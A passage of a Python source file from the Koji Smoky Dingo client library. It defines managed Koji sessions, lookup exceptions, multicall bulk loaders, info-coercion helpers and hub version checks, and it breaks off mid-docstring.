but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this library; if not, see <http://www.gnu.org/licenses/>.\n\n\n\"\"\"\nKoji Smoky Dingo - Client utilities for working with the Koji\nbuild system\n\n:author: Christopher O'Brien \n:license: GPL v3\n\"\"\"\n\n\nfrom functools import partial\nfrom koji import (\n ClientSession, Fault, GenericError, ParameterError,\n convertFault, read_config)\nfrom koji_cli.lib import activate_session, ensure_connection\nfrom logging import DEBUG, basicConfig\nfrom typing import (\n Any, Callable, Dict, Iterator, Iterable, List,\n Optional, Sequence, TypeVar, Tuple, Union, cast)\n\nfrom .common import chunkseq\nfrom .types import (\n ArchiveInfo, ArchiveInfos, ArchiveSpec,\n BuildInfo, BuildSpec,\n ChannelInfo, ChannelSpec,\n HostInfo, HostSpec,\n HubVersionSpec,\n PackageInfo, PackageSpec,\n RepoInfo, RepoSpec,\n RPMInfo, RPMInfos, RPMSignature, RPMSpec,\n TagInfo, TagSpec,\n TargetInfo, TargetSpec,\n TaskInfo, TaskSpec,\n UserInfo, UserSpec, )\n\n\n__all__ = (\n \"AnonClientSession\",\n \"BadDingo\",\n \"FeatureUnavailable\",\n \"ManagedClientSession\",\n \"NoSuchArchive\",\n \"NoSuchBuild\",\n \"NoSuchChannel\",\n \"NoSuchContentGenerator\",\n \"NoSuchHost\",\n \"NoSuchPackage\",\n \"NoSuchPermission\",\n \"NoSuchRepo\",\n \"NoSuchRPM\",\n \"NoSuchTag\",\n \"NoSuchTarget\",\n \"NoSuchTask\",\n \"NoSuchUser\",\n \"NotPermitted\",\n \"ProfileClientSession\",\n\n \"as_archiveinfo\",\n \"as_buildinfo\",\n \"as_channelinfo\",\n \"as_hostinfo\",\n \"as_packageinfo\",\n \"as_repoinfo\",\n \"as_rpminfo\",\n \"as_taginfo\",\n \"as_targetinfo\",\n \"as_taskinfo\",\n \"as_userinfo\",\n \"bulk_load\",\n \"bulk_load_build_archives\",\n \"bulk_load_build_rpms\",\n \"bulk_load_builds\",\n \"bulk_load_buildroot_archives\",\n \"bulk_load_buildroot_rpms\",\n \"bulk_load_buildroots\",\n \"bulk_load_rpm_sigs\",\n \"bulk_load_tags\",\n \"bulk_load_tasks\",\n \"bulk_load_users\",\n \"hub_version\",\n \"iter_bulk_load\",\n \"version_check\",\n \"version_require\",\n)\n\n\nclass ManagedClientSession(ClientSession):\n \"\"\"\n A `koji.ClientSession` that can be used via the ``with``\n keyword to provide a managed session that will handle\n authenticated login and logout.\n\n :since: 1.0\n \"\"\"\n\n def __enter__(self):\n self.activate()\n return self\n\n\n def __exit__(self, exc_type, _exc_val, _exc_tb):\n self.logout()\n if self.rsession:\n self.rsession.close()\n self.rsession = None\n return (exc_type is None)\n\n\n def activate(self):\n \"\"\"\n Invokes `koji_cli.lib.activate_session` with this session's\n options, which will trigger the appropriate login method.\n\n :since: 2.0\n \"\"\"\n return activate_session(self, self.opts)\n\n\n @property\n def logger(self):\n # a cached copy of `logging.getLogger('koji')`, assigned\n # during `ClientSession.__init__` invocation. There are some\n # code paths in the underlying ClientSession which will\n # presume that logging handlers have been configured, without\n # checking that they actually have been. This is likely\n # because the koji command-line interface sets up that logger\n # shortly after parsing initial CLI args. However, when a\n # script uses a ClientSession, that setup won't have\n # happened. 
Then if the script encounters an error along one\n # of those code paths, an additional logging warning will be\n # output after that path attempts to log at some unconfigured\n # level. This property allows us to set a default\n # configuration if one hasn't been given yet, just before the\n # instance would attempt to use the logger.\n\n logger = self._logger\n if logger and not logger.handlers:\n basicConfig()\n\n # the koji CLI will use the --debug and --quiet options to\n # determine the logger level. However, only the debug\n # option is recorded as part of the session options. We'll\n # mimic as much of the logging behavior as we can\n opts = self.opts\n if opts.get('debug') or opts.get('debug_xmlrpc'):\n logger.setLevel(DEBUG)\n\n return logger\n\n\n @logger.setter\n def logger(self, logger):\n self._logger = logger\n\n\nclass ProfileClientSession(ManagedClientSession):\n \"\"\"\n A `koji.ClientSession` which loads profile config information and\n which can be used via the ``with`` keyword.\n\n :since: 1.0\n \"\"\"\n\n def __init__(self, profile: str = \"koji\"):\n \"\"\"\n :param profile: name of the koji profile to load from local\n configuration locations\n \"\"\"\n\n conf = read_config(profile)\n server = conf[\"server\"]\n super().__init__(server, opts=conf)\n\n\nclass AnonClientSession(ProfileClientSession):\n \"\"\"\n A `koji.ClientSession` which loads profile config information and\n which can be used via the ``with`` keyword.\n\n Suitable for working with anonymous commands which do not require\n authentication. Does not authenticate, and will only connect\n lazily.\n\n :since: 1.0\n \"\"\"\n\n def __enter__(self):\n # we could always set up a connection ahead of time,\n # but... the connection will be created when we make our first\n # call, so let's be lazy instead.\n\n # ensure_connection(self)\n return self\n\n\n def activate(self):\n \"\"\"\n Ensures the anonymous session is connected, but does not attempt\n to login.\n\n :since: 2.0\n \"\"\"\n\n ensure_connection(self)\n\n\nclass BadDingo(Exception):\n \"\"\"\n Generalized base class for exceptions raised from kojismokydingo.\n This class and its subclasses are used to combine a fixed\n complaint string with some specific information. 
This is a\n convenience primarily for the CLI, but can also be used to track\n more detailed situations where a requested data type wasn't\n present on the koji hub, rather than just working with\n `koji.GenericError`\n\n :since: 1.0\n \"\"\"\n\n complaint: str = \"Something bad happened\"\n\n\n def __str__(self):\n orig = super().__str__()\n return f\"{self.complaint}: {orig}\"\n\n\nclass NoSuchBuild(BadDingo):\n \"\"\"\n A build was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such build\"\n\n\nclass NoSuchHost(BadDingo):\n \"\"\"\n A host was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such host\"\n\n\nclass NoSuchChannel(BadDingo):\n \"\"\"\n A channel was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such builder channel\"\n\n\nclass NoSuchContentGenerator(BadDingo):\n \"\"\"\n A content generator was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such content generator\"\n\n\nclass NoSuchPackage(BadDingo):\n \"\"\"\n A package was not found\n\n :since: 1.1\n \"\"\"\n\n complaint = \"No such package\"\n\n\nclass NoSuchTag(BadDingo):\n \"\"\"\n A tag was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such tag\"\n\n\nclass NoSuchTarget(BadDingo):\n \"\"\"\n A target was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such target\"\n\n\nclass NoSuchTask(BadDingo):\n \"\"\"\n A task was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such task\"\n\n\nclass NoSuchUser(BadDingo):\n \"\"\"\n A user was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such user\"\n\n\nclass NoSuchPermission(BadDingo):\n \"\"\"\n A permission was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such permission\"\n\n\nclass NoSuchArchive(BadDingo):\n \"\"\"\n An archive was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such archive\"\n\n\nclass NoSuchRepo(BadDingo):\n \"\"\"\n A repository was not found\n\n :since: 1.1\n \"\"\"\n\n complaint = \"No such repo\"\n\n\nclass NoSuchRPM(BadDingo):\n \"\"\"\n An RPM was not found\n \"\"\"\n\n complaint = \"No such RPM\"\n\n\nclass NotPermitted(BadDingo):\n \"\"\"\n A required permission was not associated with the currently logged\n in user account.\n \"\"\"\n\n complaint = \"Insufficient permissions\"\n\n\nclass FeatureUnavailable(BadDingo):\n \"\"\"\n A given feature isn't available due to the version on the koji hub\n \"\"\"\n\n complaint = \"The koji hub version doesn't support this feature\"\n\n\nKT = TypeVar('KT')\n\n\ndef iter_bulk_load(\n session: ClientSession,\n loadfn: Callable[[Any], Any],\n keys: Iterable[KT],\n err: bool = True,\n size: int = 100) -> Iterator[Tuple[KT, Any]]:\n \"\"\"\n Generic bulk loading generator. Invokes the given loadfn on each\n key in keys using chunking multicalls limited to the specified\n size.\n\n Yields (key, result) pairs in order.\n\n If err is True (default) then any faults will raise an exception.\n If err is False, then a None will be substituted as the result for\n the failing key.\n\n :param session: The koji session\n\n :param loadfn: The loading function, to be invoked in a multicall\n arrangement. Will be called once with each given key from keys\n\n :param keys: The sequence of keys to be used to invoke loadfn.\n\n :param err: Whether to raise any underlying fault returns as\n exceptions. Default, True\n\n :param size: How many calls to loadfn to chunk up for each\n multicall. 
Default, 100\n\n :raises koji.GenericError: if err is True and an issue\n occurs while invoking the loadfn\n\n :since: 1.0\n \"\"\"\n\n for key_chunk in chunkseq(keys, size):\n session.multicall = True\n\n for key in key_chunk:\n loadfn(key)\n\n for key, info in zip(key_chunk, session.multiCall(strict=err)):\n if info:\n if \"faultCode\" in info:\n if err:\n raise convertFault(Fault(**info)) # type: ignore\n else:\n yield key, None\n else:\n yield key, info[0] # type: ignore\n else:\n yield key, None\n\n\ndef bulk_load(\n session: ClientSession,\n loadfn: Callable[[Any], Any],\n keys: Iterable[Any],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Any, Any]:\n \"\"\"\n Generic bulk loading function. Invokes the given `loadfn` on each\n key in `keys` using chunking multicalls limited to the specified\n size.\n\n Returns a dict associating the individual keys with the returned\n value of loadfn. If `results` is specified, it must support\n dict-like assignment via an update method, and will be used in\n place of a newly allocated dict to store and return the results.\n\n :param session: an active koji client session\n\n :param loadfn: The loading function, to be invoked in a multicall\n arrangement. Will be called once with each given key from `keys`\n\n :param keys: The sequence of keys to be used to invoke `loadfn`.\n These keys need to be individually hashable, or the `results`\n value needs to be specified with an instance that accepts\n assignment using these values as the key.\n\n :param err: Whether to raise any underlying fault returns as\n exceptions. Default, `True`\n\n :param size: How many calls to `loadfn` to chunk up for each\n multicall. Default, `100`\n\n :param results: storage for `loadfn` results. If specified, must\n support item assignment (like a dict) via an update method, and\n it will be populated and then used as the return value for this\n function. Default, a new dict will be allocated.\n\n :raises koji.GenericError: if `err` is `True` and an issue\n occurs while invoking the `loadfn`\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, loadfn, keys, err, size))\n return results\n\n\ndef bulk_load_builds(\n session: ClientSession,\n nvrs: Iterable[Union[str, int]],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Union[int, str],\n BuildInfo]:\n \"\"\"\n Load many buildinfo dicts from a koji client session and a\n sequence of NVRs.\n\n Returns a dict associating the individual NVRs with their\n resulting buildinfo.\n\n If err is True (default) then any missing build info will raise a\n `NoSuchBuild` exception. If err is False, then a None will be\n substituted into the results dict for the result.\n\n If results is non-None, it must support dict assignment, and will\n be used in place of a newly allocated dict to store and return the\n results.\n\n :param nvrs: Sequence of build NVRs or build IDs to load\n\n :param err: Raise an exception if an NVR fails to load. Default,\n True.\n\n :param size: Count of NVRs to load in a single multicall. Default,\n 100\n\n :param results: mapping to store the results in. 
Default, produce\n a new dict\n\n :raises NoSuchBuild: if err is True and any of the given builds\n could not be loaded\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n\n for key, info in iter_bulk_load(session, session.getBuild, nvrs,\n False, size):\n if err and not info:\n raise NoSuchBuild(key)\n else:\n results[key] = info\n\n return results\n\n\ndef bulk_load_tasks(\n session: ClientSession,\n task_ids: Iterable[int],\n request: bool = False,\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, TaskInfo]:\n \"\"\"\n Load many taskinfo dicts from a koji client session and a sequence\n of task IDs.\n\n Returns a dict associating the individual IDs with their resulting\n taskinfo.\n\n :param session: an active koji client session\n\n :param task_ids: IDs of tasks to be loaded\n\n :param request: if True then load the task's request data as\n well. Default, False\n\n :param err: raise an exception if a task fails to load. Default,\n True\n\n :param size: count of tasks to load in a single\n multicall. Default, 100\n\n :param results: mapping to store the results in. Default, produce\n a new dict\n\n :raises NoSuchTask: if err is True and a task couldn't be loaded\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = partial(session.getTaskInfo, request=request, strict=False)\n\n for key_chunk in chunkseq(task_ids, size):\n for key, info in zip(key_chunk, fn(key_chunk)):\n if err and not info:\n raise NoSuchTask(key)\n else:\n results[key] = info\n\n return results\n\n\ndef bulk_load_tags(\n session: ClientSession,\n tags: Iterable[Union[str, int]],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Union[int, str],\n TagInfo]:\n \"\"\"\n Load many taginfo dicts from tag names or IDs.\n\n :param session: an active koji client session\n\n :param tags: tag IDs or names to load\n\n :param err: Raise an exception if a tag fails to load. Default,\n True.\n\n :param size: Count of tags to load in a single multicall. Default,\n 100\n\n :param results: mapping to store the results in. 
Default, produce\n a new dict\n\n :raises NoSuchTag: if err is True and a tag couldn't be loaded\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n\n if version_check(session, (1, 23)):\n fn = partial(session.getTag, blocked=True)\n else:\n fn = session.getTag # type: ignore\n\n for key, info in iter_bulk_load(session, fn, tags, False, size):\n if err and not info:\n raise NoSuchTag(key)\n else:\n results[key] = info\n\n return results\n\n\ndef bulk_load_rpm_sigs(\n session: ClientSession,\n rpm_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[RPMSignature]]:\n \"\"\"\n Set up a chunking multicall to fetch the signatures for a list of\n RPMs via `session.queryRPMSigs` for each ID in rpm_ids.\n\n Returns a dict associating the individual RPM IDs with their\n resulting RPM signature lists.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, session.queryRPMSigs,\n rpm_ids, True, size))\n return results\n\n\ndef bulk_load_buildroot_archives(\n session: ClientSession,\n buildroot_ids: Iterable[int],\n btype: Optional[str] = None,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[ArchiveInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the archives of buildroots\n via `session.listArchives` for each buildroot ID in buildroot_ids.\n\n Returns a dict associating the individual buildroot IDs with their\n resulting archive lists.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = lambda i: session.listArchives(componentBuildrootID=i, type=btype)\n results.update(iter_bulk_load(session, fn, buildroot_ids, True, size))\n return results\n\n\ndef bulk_load_buildroot_rpms(\n session: ClientSession,\n buildroot_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[RPMInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the RPMs of buildroots via\n `session.listRPMs` for each buildroot ID in buildroot_ids.\n\n Returns a dict associating the individual buildroot IDs with their\n resulting RPM lists.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = lambda i: session.listRPMs(componentBuildrootID=i)\n results.update(iter_bulk_load(session, fn, buildroot_ids, True, size))\n return results\n\n\ndef bulk_load_build_archives(\n session: ClientSession,\n build_ids: Iterable[int],\n btype: Optional[str] = None,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[ArchiveInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the archives of builds\n via `session.listArchives` for each build ID in build_ids.\n\n Returns a dict associating the individual build IDs with their\n resulting archive lists.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = lambda i: session.listArchives(buildID=i, 
type=btype)\n results.update(iter_bulk_load(session, fn, build_ids, True, size))\n return results\n\n\ndef bulk_load_build_rpms(\n session: ClientSession,\n build_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[RPMInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the RPMs of builds via\n `session.listRPMs` for each build ID in build_ids.\n\n Returns a dict associating the individual build IDs with their\n resulting RPM lists.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, session.listRPMs,\n build_ids, True, size))\n return results\n\n\ndef bulk_load_buildroots(\n session: ClientSession,\n broot_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, dict]:\n \"\"\"\n Set up a chunking multicall to fetch the buildroot data via\n `session.getBuildroot` for each ID in broot_ids.\n\n Returns a dict associating the individual buildroot IDs with their\n resulting buildroot info dicts.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, session.getBuildroot,\n broot_ids, True, size))\n return results\n\n\ndef bulk_load_users(\n session: ClientSession,\n users: Iterable[Union[int, str]],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Union[int, str],\n UserInfo]:\n \"\"\"\n Load many userinfo dicts from a koji client session and a sequence of\n user identifiers.\n\n Returns a dict associating the individual identifiers with their\n resulting userinfo.\n\n If err is True (default) then any missing user info will raise a\n NoSuchUser exception. If err is False, then a None will be\n substituted into the results dict for the result.\n\n If results is non-None, it must support dict assignment, and will\n be used in place of a newly allocated dict to store and return the\n results.\n\n :param session: active koji session\n\n :param users: user names or IDs to load\n\n :param err: halt on problems and raise an exception. Default, True\n\n :param size: number of users to load in a single\n multicall. Default, 100\n\n :param results: dict to store results in. Default, allocate a new\n dict\n\n :raises NoSuchUser: if err is True and a user could not be loaded\n\n :since: 1.0\n \"\"\"\n\n users = tuple(users)\n results = {} if results is None else results\n\n if not users:\n return results\n\n # we need to identify which signature the getUser API will\n # support. Unfortunately the change in signatures happened before\n # there was a way to check the hub version. First we'll check\n # whether there's already a cached answer as to which API is\n # available\n session_vars = vars(session)\n new_get_user = session_vars.get(\"__new_get_user\")\n\n if new_get_user is None:\n # there wasn't already an answer, so we'll have to find out\n # ourselves. In this case we'll load the first user in the\n # list of users separately, outside of a multicall, and using\n # the as_userinfo function. This function will first try the\n # newer signature. If successful, it will record\n # __new_get_user as True, and we'll know to use the newer\n # signature. 
If not, the function will retry with the older\n # signature and set __new_get_user to False.\n\n key = users[0]\n users = users[1:]\n\n try:\n results[key] = as_userinfo(session, key)\n except NoSuchUser:\n if err:\n raise\n else:\n results[key] = None\n\n # the use of as_userinfo will have updated the __new_get_user\n # sentinel attribute to either True or False\n new_get_user = session_vars.get(\"__new_get_user\")\n\n if new_get_user:\n fn = lambda u: session.getUser(u, False, True)\n else:\n fn = session.getUser\n\n for key, info in iter_bulk_load(session, fn, users, False, size):\n if err and not info:\n raise NoSuchUser(key)\n else:\n results[key] = info\n\n return results\n\n\ndef as_buildinfo(\n session: ClientSession,\n build: BuildSpec) -> BuildInfo:\n \"\"\"\n Coerces a build value into a koji build info dict.\n\n If build is an\n * int, will attempt to load as a build ID\n * str, will attempt to load as an NVR\n * dict, will presume already a build info\n\n :param session: active koji session\n\n :param build: value to lookup\n\n :raises NoSuchBuild: if the build value could not be resolved\n into a build info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(build, (str, int)):\n info = session.getBuild(build)\n elif isinstance(build, dict):\n info = build\n else:\n info = None\n\n if not info:\n raise NoSuchBuild(build)\n\n return info\n\n\ndef as_channelinfo(\n session: ClientSession,\n channel: ChannelSpec) -> ChannelInfo:\n \"\"\"\n Coerces a channel value into a koji channel info dict.\n\n If channel is an\n * int, will attempt to load as a channel ID\n * str, will attempt to load as a channel name\n * dict, will presume already a channel info\n\n :param session: an active koji client session\n\n :param channel: value to lookup\n\n :raises NoSuchChannel: if the channel value could not be resolved\n into a channel info dict\n\n :since: 1.1\n \"\"\"\n\n if isinstance(channel, (str, int)):\n info = session.getChannel(channel)\n elif isinstance(channel, dict):\n info = channel\n else:\n info = None\n\n if not info:\n raise NoSuchChannel(channel)\n\n return info\n\n\ndef as_taginfo(\n session: ClientSession,\n tag: TagSpec) -> TagInfo:\n \"\"\"\n Coerces a tag value into a koji tag info dict.\n\n If tag is an\n * int, will attempt to load as a tag ID\n * str, will attempt to load as a tag name\n * dict, will presume already a tag info\n\n :param session: active koji session\n\n :param tag: value to lookup\n\n :raises NoSuchTag: if the tag value could not be resolved into a\n tag info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(tag, (str, int)):\n if version_check(session, (1, 23)):\n info = session.getTag(tag, blocked=True)\n else:\n info = session.getTag(tag)\n\n elif isinstance(tag, dict):\n info = tag\n\n else:\n info = None\n\n if not info:\n raise NoSuchTag(tag)\n\n return info\n\n\ndef as_taskinfo(\n session: ClientSession,\n task: TaskSpec) -> TaskInfo:\n \"\"\"\n Coerces a task value into a koji task info dict.\n\n If task is an\n * int, will attempt to load as a task ID\n * dict, will presume already a task info\n\n Note that if this function does attempt to load a task, it will\n request it with the task's request data as well.\n\n :param session: active koji session\n\n :param task: value to lookup\n\n :raises NoSuchTask: if the task value could not be resolved\n into a task info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(task, int):\n info = session.getTaskInfo(task, True)\n elif isinstance(task, dict):\n info = task\n else:\n info = None\n\n if not info:\n 
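# either the spec was not an int or dict, or the hub has no such task\n 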
raise NoSuchTask(task)\n\n return info\n\n\ndef as_targetinfo(\n session: ClientSession,\n target: TargetSpec) -> TargetInfo:\n \"\"\"\n Coerces a target value into a koji target info dict.\n\n If target is an\n * int, will attempt to load as a target ID\n * str, will attempt to load as a target name\n * dict, will presume already a target info\n\n :param session: active koji session\n\n :param target: value to lookup\n\n :raises NoSuchTarget: if the target value could not be resolved\n into a target info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(target, (str, int)):\n info = session.getBuildTarget(target)\n elif isinstance(target, dict):\n info = target\n else:\n info = None\n\n if not info:\n raise NoSuchTarget(target)\n\n return info\n\n\ndef as_hostinfo(\n session: ClientSession,\n host: HostSpec) -> HostInfo:\n \"\"\"\n Coerces a host value into a host info dict.\n\n If host is an:\n * int, will attempt to load as a host ID\n * str, will attempt to load as a host name\n * dict, will presume already a host info\n\n :param session: active koji session\n\n :param host: value to lookup\n\n :raises NoSuchHost: if the host value could not be resolved\n into a host info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(host, (str, int)):\n info = session.getHost(host)\n elif isinstance(host, dict):\n info = host\n else:\n info = None\n\n if not info:\n raise NoSuchHost(host)\n\n return info\n\n\ndef as_packageinfo(\n session: ClientSession,\n pkg: PackageSpec) -> PackageInfo:\n \"\"\"\n Coerces a package value into a package info dict.\n\n If pkg is an:\n * int, will attempt to load as a package ID\n * str, will attempt to load as a package name\n * dict, will presume already a package info\n\n :param session: an active koji client session\n\n :param pkg: value to lookup\n\n :raises NoSuchPackage: if the pkg value could not be resolved into\n a package info dict\n\n :since: 1.1\n \"\"\"\n\n if isinstance(pkg, (str, int)):\n info = session.getPackage(pkg)\n elif isinstance(pkg, dict):\n info = pkg\n else:\n info = None\n\n if not info:\n raise NoSuchPackage(pkg)\n\n return info\n\n\ndef as_archiveinfo(\n session: ClientSession,\n archive: ArchiveSpec) -> ArchiveInfo:\n \"\"\"\n Coerces an archive value into an archive info dict.\n\n If archive is an:\n * int, will attempt to load as an archive ID\n * str, will attempt to load as the first-found archive matching\n the given filename\n * dict, will presume already an archive info\n\n :param session: active koji session\n\n :param archive: value to lookup\n\n :raises NoSuchArchive: if the archive value could not be resolved\n into an archive info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(archive, int):\n info = session.getArchive(archive)\n\n elif isinstance(archive, str):\n found = session.listArchives(filename=archive)\n info = found[0] if found else None\n\n elif isinstance(archive, dict):\n info = archive\n\n else:\n info = None\n\n if not info:\n raise NoSuchArchive(archive)\n\n return info\n\n\ndef as_repoinfo(\n session: ClientSession,\n repo: RepoSpec) -> RepoInfo:\n \"\"\"\n Coerces a repo value into a Repo info dict.\n\n If repo is an:\n * dict with name, will attempt to load the current repo from a\n tag by that name\n * str, will attempt to load the current repo from a tag by name\n * int, will attempt to load the repo by ID\n * dict, will presume already a repo info\n\n :param session: active koji session\n\n :param repo: value to lookup\n\n :raises NoSuchRepo: if the repo value could not be resolved\n into a repo info dict\n\n 
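Example (the tag name here is hypothetical)::\n\n repo = as_repoinfo(session, \"example-build-tag\")\n print(repo[\"id\"])\n\n 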
:since: 1.1\n \"\"\"\n\n info: RepoInfo = None\n\n if isinstance(repo, dict):\n if \"name\" in repo:\n tag = cast(TagInfo, repo)\n repo = tag[\"name\"]\n else:\n info = cast(RepoInfo, repo)\n\n if isinstance(repo, str):\n repotag = session.getRepo(repo)\n if repotag is None:\n raise NoSuchRepo(repo)\n repo = repotag[\"id\"]\n\n if isinstance(repo, int):\n info = session.repoInfo(repo)\n\n if not info:\n raise NoSuchRepo(repo)\n\n return info\n\n\ndef as_rpminfo(\n session: ClientSession,\n rpm: RPMSpec) -> RPMInfo:\n \"\"\"\n Coerces an RPM value into an RPM info dict.\n\n If rpm is specified as an:\n * int, will attempt to load as an RPM ID\n * str, will attempt to load as an RPM NVRA\n * dict, will presume already an RPM info\n\n :param session: active koji session\n\n :param rpm: value to lookup\n\n :raises NoSuchRPM: if the rpm value could not be resolved\n into an RPM info dict\n\n :since: 1.0\n \"\"\"\n\n info: RPMInfo\n\n if isinstance(rpm, (str, int)):\n info = session.getRPM(rpm) # type: ignore\n elif isinstance(rpm, dict):\n info = rpm\n else:\n info = None\n\n if not info:\n raise NoSuchRPM(rpm)\n\n return info\n\n\ndef as_userinfo(\n session: ClientSession,\n user: UserSpec) -> UserInfo:\n \"\"\"\n Resolves user to a userinfo dict.\n\n If user is a str or int, then getUser will be invoked. If user is\n already a dict, it's presumed to be a userinfo and it's\n returned unaltered.\n\n :param session: active koji session\n\n :param user: Name, ID, or User Info describing a koji user\n\n :raises NoSuchUser: when user cannot be found\n\n :since: 1.0\n \"\"\"\n\n if isinstance(user, (str, int)):\n session_vars = vars(session)\n new_get_user = session_vars.get(\"__new_get_user\")\n\n if new_get_user:\n # we've tried the new way and it worked, so keep doing it.\n info = session.getUser(user, False, True)\n\n elif new_get_user is None:\n # an API incompatibility emerged at some point in Koji's\n # past, so we need to try the new way first and fall back\n # to the older signature if that fails. 
This happened\n # before Koji hub started reporting its version, so we\n # cannot use the version_check function to gate this.\n try:\n info = session.getUser(user, False, True)\n session_vars[\"__new_get_user\"] = True\n\n except ParameterError:\n info = session.getUser(user)\n session_vars[\"__new_get_user\"] = False\n\n else:\n # we've already tried the new way once and it didn't work.\n info = session.getUser(user)\n\n elif isinstance(user, dict):\n info = user\n\n else:\n info = None\n\n if not info:\n raise NoSuchUser(user)\n\n return info\n\n\ndef _int(val):\n if isinstance(val, str) and val.isdigit():\n val = int(val)\n return val\n\n\ndef hub_version(\n session: ClientSession) -> Tuple[int]:\n \"\"\"\n Wrapper for ``session.getKojiVersion`` which caches the results on\n the session and splits the value into a tuple of ints for easy\n comparison.\n\n If the getKojiVersion method isn't implemented on the hub, we\n presume that we're version 1.22 ``(1, 22)`` which is the last\n version before the getKojiVersion API was added.\n\n :param session: active koji session\n\n :since: 1.0\n \"\"\"\n\n # we need to use this instead of getattr as koji sessions will\n # automatically create all missing properties as proxies to a\n # remote hub method.\n session_vars = vars(session)\n\n hub_ver = session_vars.get(\"__hub_version\", None)\n if hub_ver is None:\n try:\n hub_ver = session.getKojiVersion()\n except GenericError:\n pass\n\n if hub_ver is None:\n hub_ver = (1, 22)\n\n elif isinstance(hub_ver, str):\n hub_ver = tuple(map(_int, hub_ver.split(\".\")))\n\n session_vars[\"__hub_version\"] = hub_ver\n\n return hub_ver\n\n\ndef version_check(\n session: ClientSession,\n minimum: HubVersionSpec = (1, 23)) -> bool:\n \"\"\"\n Verifies that the requested minimum version is met compared\n against session.getKojiVersion.\n\n If the getKojiVersion method isn't implemented on the hub, we\n presume that we're version 1.22 (the last version before\n getKojiVersion was added). Because of this, checking for minimum\n versions lower than 1.23 will always return True.\n\n Version is specified as a tuple of integers, eg. 1.23 is ``(1,\n 23)``\n\n :param session: active koji session\n\n :param minimum: Minimum version required. Default, ``(1, 23)``\n\n :since: 1.0\n \"\"\"\n\n if isinstance(minimum, str):\n minimum = tuple(map(_int, minimum.split(\".\")))\n\n hub_ver = hub_version(session)\n\n return bool(hub_ver and hub_ver >= minimum)\n\n\ndef version_require(\n session: ClientSession,\n minimum: HubVersionSpec = (1, 23),\n message: Optional[str] = None) -> bool:\n \"\"\"\n Verifies that the requested minimum version is met compared\n against ``session.getKojiVersion()``\n\n If the getKojiVersion method isn't implemented on the hub, we\n presume that we're version 1.22 (the last version before\n getKojiVersion was added). Because of this, checking for minimum\n versions lower than 1.23 will always return True.\n\n Version is specified as a tuple of integers, eg. 1.23 is ``(1,\n 23)``\n\n If the version requirement is not met, a `FeatureUnavailable`\n exception is raised, with the given message. If message is not\n provided, a simple one is constructed based on the minimum value.\n\n :param session: active koji session\n\n :param minimum: Minimum version required. Default, ``(1, 23)``\n\n :param message: Message to use in exception if version check\n fails. 
